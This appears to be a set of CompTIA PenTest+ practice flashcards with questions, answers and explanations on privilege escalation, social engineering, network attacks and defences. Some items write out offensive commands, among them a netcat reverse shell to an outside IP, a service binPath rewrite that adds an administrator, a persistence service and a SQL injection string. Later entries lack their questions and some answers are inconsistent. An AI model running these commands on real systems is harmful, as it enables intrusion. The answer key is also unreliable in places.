C:\Users\jason\Desktop> sc config “Apache” binPath= “net localgroup administrators jason /add”

C:\Users\jason\Desktop> sc stop “Apache”

C:\Users\jason\Desktop> sc start “Apache”

=-=-=-=-=
Based on the output above, which of the following types of vulnerabilities is Jason exploiting?

A.Unquoted service paths
B.Writable services
C.Insecure file/folder permissions
D.Insecure sudo

Answer

A

B.Writable services

Explanation: Some Windows services are run with SYSTEM privileges and may have been misconfigured by the administrator. In this case, Jason used the accesschk tool from SysInternals to find any writeable services that his user account could access. One was returned: Apache. He then stopped the service and rewrote the binary path loaded by the service to “net localgroup administrators jason /add”, which will be run the next time the service is started. This will add Jason’s user account (jason) to the administrators group. Next, he started the service, completing his privilege escalation through the use of writeable services.

Question 40

Q

Which of the following might be exploited on a Linux server to conduct a privilege escalation?

A.Kerberoasting
B.Insecured sudo
C.Cpassword
D.DLL hijacking

Answer

A

B.Insecured sudo

Explanation: OBJ-3.5: An insecure sudo vulnerability could allow an attacker to circumvent protections and execute commands that would normally require a password, resulting in privilege escalation. Kerberoasting, Cpassword, and DLL hijacking are Windows-specific privilege escalation techniques.

Question 41

Q

During a penetration test, which of the following should you perform if your goal is to conduct a successful whaling attack?

A.Send a text message with a malicious link to the organizations executives
B.Send targeted emails with a malicious attachment to the sales team
C.Send a targeted email with a malicious attachment to the organizations CEO
D.Call the CTO’s assistant using a pretext to gather information about their schedule

Answer

A

C.Send a targeted email with a malicious attachment to the organizations CEO

Explanation: OBJ-3.1: Whaling is a type of spear phishing attack that specifically targets wealthy or powerful individuals. In penetration testing, when the attacker targets a C-level executive (CEO, CFO, CTO, CIO, etc.), this is considered whaling.

Question 42

Q

An attacker was able to gain access to your organization’s network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network.
What attack should he use?

A.Fraggle
B.MAC Flood
C.Smurf
D.Tear Drop

Answer

A

B.MAC Flood

Explanation: OBJ-3.2: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address.

Question 43

Q

You are planning to exploit a network-based vulnerability against a Windows server. You have determined that it is vulnerable to the EternalBlue exploit because the system hasn’t installed the MS17-010 security patch. From your research, you know that this exploit would allow you to conduct arbitrary remote code execution by exploiting a fault in the communication protocol used by Windows file and print servers. Which of the following types of exploits are you planning?

A.SNMP Exploit
B.FTP Exploit
C.SMB Exploit
D.SMTP Exploit

Answer

A

C.SMB Exploit

Explanation: OBJ-3.2: Server Message Block (SMB) allows clients to read from and write to a server service, providing core authentication and communications for Windows file and print servers. The EternalBlue exploit was released in early 2017, and it can be used against Windows (Vista SP2 through Server 2016, both 32-bit and 64-bit versions).

Question 44

Q

While conducting a penetration test against an organization, you created a clone of the login page of the company’s webmail system using the Social Engineer Toolkit (SET). You wait until the Chief Financial Officer (CFO) logs into the website and capture their credentials.

Which of the following attacks should you perform next using the CFO’s credentials?

A.Vishing
B.Impersonation
C.Downgrade
D.Phishing

Answer

A

B.Impersonation

Explanation: OBJ-3.1: Impersonation is the act of pretending to be someone you are not. Elicitation is the collection or acquisition of data from human beings, usually through deception or social engineering. These two are often used together in an attack. Since the penetration tester is trying to gather the CFO’s login credentials, they are likely trying to perform an account takeover to conduct an impersonation attack using a business email compromise (BEC) to elicit some action from personnel within the organization. The Social Engineer Toolkit (SET) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system.

Question 45

Q

You are reviewing the IDS logs and notice the following log entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- (where email=support@diontraining.com and password=‘ or 7==7’) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of attack is being performed?

A.XML Injection
B.SQL Injection
C.Header Manipulation
D.Cross-site scripting

Answer

A

B.SQL Injection

Explanation: OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. The injection of unintended XML content and/or structures into an XML message can alter the application’s intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

Question 46

Q

Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems.

Which of the following techniques would most likely detect the APT?

A.Network traffic analysis
B.Network forensics
C.Endpoint behavior analysis
D.Endpoint forensics

Answer

A

D.Endpoint forensics

Explanation: OBJ-3.5: An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.

Question 47

Q

What kind of security vulnerability would a newly discovered flaw in a software application be considered?

A.Input validation flaw
B.HTTP header injection vulnerability
C.Zero-day vulnerability
D.TIme-to-check to time-to-use flaw

Answer

A

C.Zero-day vulnerability

Explanation OBJ-3.1: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check’s results and the difference in time passed. This is an example of a race condition.

Question 48

Q

An attacker recently compromised an e-commerce website for a clothing store.

Which of the following methods did the attacker use to harvest an account’s cached credentials when the user logged into an SSO system?

A.Pass the hash
B.Lateral movement
C.Pivoting
D.Golden ticket

Answer

A

A.Pass the hash

Explanation: OBJ-3.2: Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

Question 49

Q

You are scheduled to conduct a physical penetration test against an organization.

You need to access the building during business hours and in the evening, even if none of the employees are on-site.

Which of the following methods would be the MOST effective to utilize?

A.Fence jumping
B.Badge cloning
C.Lock picking
D.Tailgating

Answer

A

B.Badge cloning

Explanation: OBJ-3.6: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object’s physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge’s microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You hold the badge up to the RFID writer device, press a button to copy its tag’s data, then hold a blank badge up to the device, and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.

Question 50

Q

You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you received the following warning: “The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.” You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Answer

A

C.You tell the developer to review their code and implement a bug/code fix Explanation OBJ-3.4: Since your company owns the website, you can require the developer to implement a bug/code fix to prevent the form from allowing the AUTOCOMPLETE function to work on this website. The code change to perform is quite simple, simply adding “autocomplete=off” to the code’s first line. The resulting code would be .

Question 51

Q

A disgruntled employee executes a man-in-the-middle attack on the company network. Layer 2 traffic destined for the gateway is redirected to the employee’s computer. What type of attack is this an example of?

A.ARP cache poisoning
B.IP spoofing
C.Amplified DNS attack
D.Evil twin

Answer

A

A.ARP cache poisoning

Explanation: OBJ-3.2: ARP poisoning reroutes data and allows an attacker to intercept packets of data intended for another recipient. ARP attacks can be sent from any host on the local area network, and the goal is to associate the host so that any traffic meant for something else will instead go directly to the attacker’s PC.

Question 52

Q

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

A.Phishing
B.Whaling
C.Spear phishing
D.VIshing

Answer

A

C.Spear phishing

Explanation: OBJ-3.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

Question 53

Q

You are working as part of a penetration testing team during an engagement. A coworker just entered “New-Service -Name “DionTrainingApp” -BinaryPathName C:\Windows\temp\WindowsTools.exe” in PowerShell on the Windows server the team exploited. What action is your coworker performing with this command?

A.To enable persistence on the server
B.To enumerate the running services on the server
C.To remove persistence on the server
D. TO shutdown the running service on the server

Answer

A

A.To enable persistence on the server

Explanation: OBJ-3.7: This scenario is using a command to add persistence to a Windows server using PowerShell. The command entered adds a new service named Dion Training App with the binary listed in the command. This will add persistence to the system by running the Dion Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

Question 54

Q

Your network is currently under attack from multiple hosts outside of the network.

Which type of attack is most likely occurring?

A.DoS
B.Spoofing
C.DDoS
D.Wardriving

Answer

A

C.DDoS

Explanation: OBJ-3.2: A Distributed Denial of Service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system or network. DoS and Spoofing attacks originate from a single host, while wardriving is focused on the surveillance and reconnaissance of wireless networks.

Question 55

Q

Which of the following types of attacks occurs when an attacker specifically targets the CEO, CFO, CIO, and other board members during their attack?

A.Phishing
B.Whaling
C.Spear Phishing
D.Vishing

Answer

A

B.Whaling

Explanation: OBJ-3.1: Whaling occurs when the attacker targets the C-level executives (CEO, CFO, CIO, etc.), board members, and other senior executives within the organization.

Question 56

Q

Which of the following commands should be run on a victim’s system to connect to a reverse shell?

A. nc -lp 31337
B.nc 192.168.1.53 31337 -e /bin/sh
C. nc -lp 31337 -e /bin/sh
D.nc 192.168.1.53 31337

Answer

A

B.nc 192.168.1.53 31337 -e /bin/sh

Explanation: OBJ-4.3: A reverse shell is established when the target machines communicate with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 –e /bin/sh” on it. A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell.

Question 57

Q

What tool can be used to scan a network to perform vulnerability checks and compliance auditing?

A.Nmap
B.Metasploit
C.Nessus
D.BeEF

Answer

A

C.Nessus

Explanation: OBJ-4.2: Nessus is a popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Question 58

Q

A cybersecurity analyst is attempting to classify network traffic within an organization.

The analyst runs the tcpdump command and receives the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ tcpdump -n -i eth0

15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 18060 win 16549 15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136(148) ack 157 win 113 15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following statements is true based on this output?

A. 10.0.19.121 is under attack from a host at 11.154.12.121
B.11.154.12.121 is a client that is accessing an SSH server over port 52497
C.11.154.12.121 is under attack from a host at 10.0.19.121
D.10.0.19.121 is a client that is accessing an SSH server over port 52497

Answer

A

D.10.0.19.121 is a client that is accessing an SSH server over port 52497

Explanation: OBJ-4.3: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) runs an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is not evidence of an attack against either the server or the client based on this output since we can only see the headers and not the content being sent between the client and server.

Question 59

Q

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier.

The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain.

What tool should the attacker use?

A.Nmap
B.Nessus
C.Cain and Abel
D.Netcat

Answer

A

C.Cain and Abel

Explanation: OBJ-4.2: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

Question 60

Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

A.Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080

B.Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

C.Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

D.Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76

Answer

A

B.Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

Explanation: OBJ-4.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

Question 61

Q

You are conducting a quick nmap scan of a target network.

You want to conduct an SYN scan, but you don’t have raw socket privileges on your workstation.

Which of the following commands should you use to conduct the SYN scan from your workstation?

A.nmap -sS
B.nmap -O
C.nmap -sT
D.nmap -sX

Answer

A

C.nmap -sT

Explanation: OBJ-4.1: The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you d not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using an SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct a Xmas scan where the FIN, PSH, and URG flags are used in the scan. The -O flag would conduct an operating system detection scan of the target system.

Question 62

Q

A penetration tester wants to install an integrated platform for testing web applications.

The software should allow them to capture, analyze, and manipulate HTTP traffic.

Which of the following tools should they install?

A.SET
B.Burp Suite
C.Kismet
D.Proxychains

Answer

A

B.Burp Suite

Explanation: OBJ-4.2: Burp Suite is an integrated platform included for testing web applications’ security by acting as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. SET (Social Engineer Toolkit) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Censys is a search engine that returns information about the types of devices connected to the Internet.

Question 63

Q

!/usr/bin/python s = “DionTraining.com” print(s[1:12:3])

You are analyzing a Python script that isn’t functioning properly. You suspect the issue is with the string manipulation being used in the code. Review the following Python code snippet:

-=-=-=-=-=-

Based on your analysis, what should be displayed on the screen by the print command?

A.iTin
B.m.ia
C.Dnai
D.orng

Answer

A

A.iTin

Explanation: OBJ-4.4: When evaluating the code s[1:12:3], you would receive “iTin” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “DionTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The format for the array is [start:end:increment], so s[1:12:3] is evaluated as starting with the 1st position (i in Dion since computers start counting at 0), count by three until you reach the 12th position (. In DionTraining.com). This would display the 1st position (i), 4th position (T), 7th position (i), 10th position (n), and then stop. This is because the command said to stop at the 12th position, but our next position to display would have been 13 when incrementing by 3 each time.

Question 64

Q

You have just run the following commands on your Linux workstation:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DionTraining:~ root# ls Names.txt DionTraining:~
root# more Names.txt DION DIOn DIon Dion dion DionTraining:~
root# grep -i DION Names.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following options would be included as part of the output for the grep command issued? (Select ANY that apply)

A.DION
B.DIOn
C.Dion
D.Dion
E.dion

Answer

A

A.DION

B.DIOn

C.Dion

D.Dion

E.dion

Explanation: OBJ-4.4: The grep (global search for regular expressions and print) is one of Linux’s powerful search tools. The general syntax for the grep command is “grep [options] pattern [files]. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word “DION” will be presented from the file and displayed as the command output. By default, grep uses case sensitivity, so “grep DION Names.txt” would only display the output as “DION” and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.

Answer 65

A

C.Shodan

Explanation; OBJ-4.2: Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company’s public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company’s network. OpenVas, SET, and Aircrak-NG are not considered OSINT tools. OpenVas is a vulnerability scanner. SET is a social engineering tool. Aircrack-NG is a wireless hacking tool.

Answer 66

A

B.Password spraying

Explanation: OBJ-4.3: Password spraying refers to the attack method that takes many usernames and loops them with a single password. We can use multiple iterations using many different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraud. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack for their own purposes. Session hijacking exploits a valid computer session to gain unauthorized access to information or services in a computer system.

Answer 67

A

C.ujepmnxf

Explanation: OBJ-4.3: The least complex password of these four options is ujepmnxf. All four passwords are eight characters, so the least complex password will be the one that uses the smallest character set. As shown in the password 4@kn?Q9$, there are four character types: uppercase letters, lowercase letters, numbers, and symbols. The least complex password only uses one of these character types. Therefore, the password ujepmnxf is the least complex and least secure password since it only includes lowercase letters.

Answer 68

A

E.This appears to be normal be network traffic

Explanation OBJ-4.3: This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.diontraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the internal host’s firewall since it is not running those services on the host. None of this network traffic appears to be suspicious.

Answer 69

A

B.Train

Explanation: OBJ-4.4: When evaluating the code s[4:9], you would receive “Train” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “DionTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. For example, if you enter s[5], you would receive the letter “r” in response. The format for the array is [start:end:increment], so s[4:9] is evaluated as starting with the 4th position (T in DionTraining.com since computers start counting at 0) and continuing to display letters until it reaches the 9th position (the second letter i in Training). This is because it treats ranges as the start value and the value to stop when it reaches it, similar to a for loop. If we wanted that “I” to be displayed as well, we would need to stop at 10 instead of 9. Since there is no increment provided in this argument, it uses the default of 1 position at a time, moving from left to right as it counts upward through the string.

Answer 70

A

B.Sticky MAC

Explanation: OBJ-5.3: Persistent MAC learning, also known as Sticky MAC, is a port security feature that enables an interface to retain dynamically learned MAC addresses when the switch is restarted or if the interface goes down and is brought back online. This is a security feature that can be used to prevent someone from unplugging their office computer and connecting their own laptop to the network jack without permission since the switch port connected to that network jack would only allow the computer with the original MAC address to gain connectivity using Sticky MAC.

Answer 71

A

A.Change the repository from public to private

Explanation: OBJ-5.3: Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company’s ongoing business operations. Reevaluation of the company’s information management policies should be done, but this is not as time-critical as changing the repository’s public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.

Answer 72

A

D.pa55w0rd

Explanation: OBJ-5.3: Password policies often enforce a mixture of standard character types, including uppercase letters, lowercase letters, numbers, and symbols. The option ‘pa55word’ is the weakest choice since it only includes lowercase letters and numbers. The option ‘Pa55w0rd’ is slightly more complex since it includes uppercase letters, lowercase letters, and numbers. The option ‘P@$$W0RD is also similar in complexity since it includes uppercase letters, numbers, and special characters. The most secure option is ‘P@5$w0rd’ since it includes a mixture of uppercase letters, lowercase letters, numbers, and special characters.

Answer 73

A

C.To remove persistence on the server

Explanation: OBJ-5.2: This scenario is using a chained command to remove persistence from a Windows server using PowerShell. The command entered removes a service named Dion Training App. The command uses Get-Service to get an object representing the Dion Training App service using the display name. The pipeline operator (|) pipes the object to Remove-Service, which removes the service. This will remove any persistence gained by running the Dion Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

Answer 74

A

D.De-confliction

Explanation: OBJ-5.4: De-confliction is the process of avoiding an early conclusion to an engagement by coordinating the penetration testing team’s efforts amongst themselves or with a few key trusted personnel in the client organization. If the penetration tester did not create the account, then the trusted agent would have begun an incident response to hunt down and clear the cause of a new administrative account being created. If this occurred, the penetration test would have been stopped or paused during this incident response.

Answer 75

A

D.Problems Explanation: OBJ-5.3: All possible solutions can be categorized as People, Process, or Technology solutions.

Answer 76

A

B.Install a mantrap at the entrance

Explanation OBJ-5.3: A mantrap is a device that only allows a single person to enter per authentication. This authentication can be done by RFID, a PIN, or other methods. Once verified, the mantrap lets a single person enter through a system, such as a turnstile or rotating door. CCTV will not stop piggybacking, but it could be used as a detective control after an occurrence. Wearing security badges is useful, but it won’t stop piggybacking by a skilled social engineer. RFID badges may be used as part of your entry requirements, but it won’t stop a determined piggyback who follows an employee into the building after their authenticated RFID access has been performed.

Answer 77

A

A.Risk appetite

Explanation: OBJ-5.1: An organization’s willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems. Risk avoidance is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk deterrence is the response of deploying security controls to reduce the likelihood and/or impact of a threat scenario. Risk transference moves or shares the responsibility of risk to another entity.

Answer 78

A

D.Modifying logs files

Explanation: OBJ-5.2: Pentesters rarely need to modify log files, and it should not be conducted after an assessment/engagement has occurred. When an assessment is complete, the pentester should remove any shells, tester-created credentials, or tools from the victimized hosts to ensure an attacker does not utilize them against the organization, too.

Answer 79

A

C.Change sshd_config to deny root login

Explanation: OBJ-5.3: Linux systems use the sshd (SSH daemon) to provide ssh connectivity. If Tim changes the sshd_config to deny root logins, it will still allow any authenticated non-root user to connect over ssh. The sshd service has a configuration setting that is named PermitRootLogin. If you set this configuration setting to no or deny, all root logins will be denied by the ssh daemon. If you didn’t know about this setting, you could still answer this question by using the process of elimination. An iptables rule is a Linux firewall rule, and this would block the port for ssh, not the root login. Adding root to the sudoers group won’t help either since the sudoers group allows users to login as root. If you have a network IPS rule to block root logins, the IPS would have to see the traffic being sent within the SSH tunnel. This is not possible since SSH connections are encrypted end-to-end by default. Therefore, the only possible right answer is to change the sshd_config setting to deny root logins.

Answer 80

A

A.DENY TCP ANY HOST 71.168.10.45 EQ 3389

EXPLANATION: OBJ-5.3: Since the question asks you to prevent unauthorized service access, we need to block port 3389 from accepting connections on 71.168.10.45 (the host). This option will deny ANY workstation from connecting to this machine (host) over the Remote Desktop Protocol service that is unauthorized (port 3389).

Answer 81

A

D.OpenIOC

Explanation: OBJ-5.4: OpenIOC is essentially just a flat database of known indicators of compromise. The MITRE ATT&CK provides additional details about detection and mitigation. The Diamond model is an analytic framework for describing an attacker’s work. Lockheed Martin’s cyber kill chain provides a generalized concept for how an attacker might approach a network but does not deal with individual IOCs’ specifics.

Answer 82

A

A.Power level

Explanation: OBJ-5.3: The power level should be reduced for the radio transmitter in the wireless access points. With a reduced power level, the signal will not travel as far, which can ensure the signal remains within the building’s interior only. The other options, if changed, would affect the availability of the network to the currently configured users and their devices.

Answer 83

A

D.Only allowe administration to access routers using port 22

Explanation: OBJ-5.3: Port 22 uses SSH to authenticate a remote computer or user, or in this case, an administrator. Even if the router has been compromised, the new full rights user will not access their new account without the SSH key, which could only be provided by a true administrator. Telnet uses port 23 and passes all information as unencrypted traffic on the network. Telnet should always be disabled for security reasons, and SSH (which uses encryption) should be used instead.

Answer 84

A

B.Credentialed scan

Explanation: OBJ-2.2: Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results. Non-credentialed scans rely on external resources for configuration settings that can be altered or incorrect. The scanner’s network location does not directly impact the ability to read the configuration information, so it would not make a difference if you conducted an external or internal scan.

Answer 85

A

C.Blue team

Explanation: OBJ-1.3: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

Brainscape's Knowledge GenomeTM

CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon5 of 6) Flashcards

Brainscape's Knowledge Genome^TM